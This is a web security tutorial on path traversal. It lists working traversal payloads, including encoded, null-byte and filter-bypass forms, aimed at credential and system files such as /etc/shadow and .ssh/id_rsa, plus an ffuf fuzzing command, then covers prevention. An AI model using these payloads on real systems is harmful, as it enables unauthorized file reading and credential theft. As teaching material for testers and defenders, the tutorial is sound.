Path Traversal Explained: Escaping the Web Root
Understanding and exploiting directory traversal vulnerabilities
What is Path Traversal?
Path Traversal (also called Directory Traversal) is a web security vulnerability that allows attackers to read arbitrary files on the server by manipulating file paths with “../” sequences and similar constructs.
Normal File Access
Legitimate request for an image:
GET /images/profile.jpg HTTP/1.1
Path Traversal Attack
Malicious request to access sensitive files:
GET /images/../../../../etc/passwd HTTP/1.1
How Path Traversal Works
By using “../” sequences, an attacker can escape the web root directory and access files anywhere on the server’s filesystem.
Common Vulnerable Scenarios
1. File Download Functionality
https://example.com/download?file=../../../../etc/passwd
2. Image Loading
https://example.com/loadImage?img=../../../.ssh/id_rsa
3. Template Inclusion
https://example.com/render?template=../../../../proc/self/environ
Path Traversal Techniques
| Technique | Example | Purpose |
|---|---|---|
| Basic traversal | ../../etc/passwd |
Standard path traversal |
| URL encoding | ..%2F..%2Fetc%2Fpasswd |
Bypass simple filters |
| Double encoding | ..%252F..%252Fetc%252Fpasswd |
Bypass multiple decoding layers |
| Null byte | ../../etc/passwd%00 |
Terminate string after payload |
| Absolute path | /etc/passwd |
Direct file reference |
Testing for Path Traversal
1. Manual Testing
- Identify file parameters (file, path, doc, etc.)
- Try basic traversal sequences
- Experiment with different encodings
- Test for file existence
2. Common Files to Check
/etc/passwd /etc/shadow /proc/self/environ /var/log/apache2/access.log C:\Windows\System32\drivers\etc\hosts
3. Automated Tools
# Using Burp Suite 1. Spider the application 2. Find file parameters 3. Use Intruder with traversal payloads # Using ffuf ffuf -u "https://example.com/download?file=FUZZ" -w traversal.txt
Bypassing Defenses
1. Path Normalization Bypass
....// ....\/ ..\/.. %2e%2e%2f .%2e/%2e%2e/%2f
2. Starting Directory Bypass
When restricted to a specific directory:
/var/www/html/uploads/../../../etc/passwd uploads/../../../../etc/passwd
3. File Extension Bypass
When required extensions are enforced:
../../etc/passwd%00.jpg ../../etc/passwd?.jpg ../../etc/passwd%23.jpg
Real-World Examples
Case 1: Web Server Configuration
A CMS plugin allowed file downloads via a parameter vulnerable to traversal, exposing server credentials.
Case 2: Image Processing Service
An image resizing service didn’t validate input paths, allowing access to AWS credentials.
Case 3: Log Viewer Application
A web-based log viewer accepted arbitrary paths, exposing sensitive system files.
Prevention and Mitigation
1. Input Validation
- Whitelist allowed characters
- Reject paths containing “../”
- Canonicalize paths before validation
2. Secure File Operations
- Use index-based file access when possible
- Prepend a base directory to all paths
- Use chroot jails for sensitive operations
3. Server Configuration
- Run web server with least privileges
- Use filesystem permissions effectively
- Regularly audit file access logs
Conclusion
Path Traversal remains a critical vulnerability because:
- It’s often easy to exploit
- The impact can be severe (system compromise)
- Many developers underestimate the risk
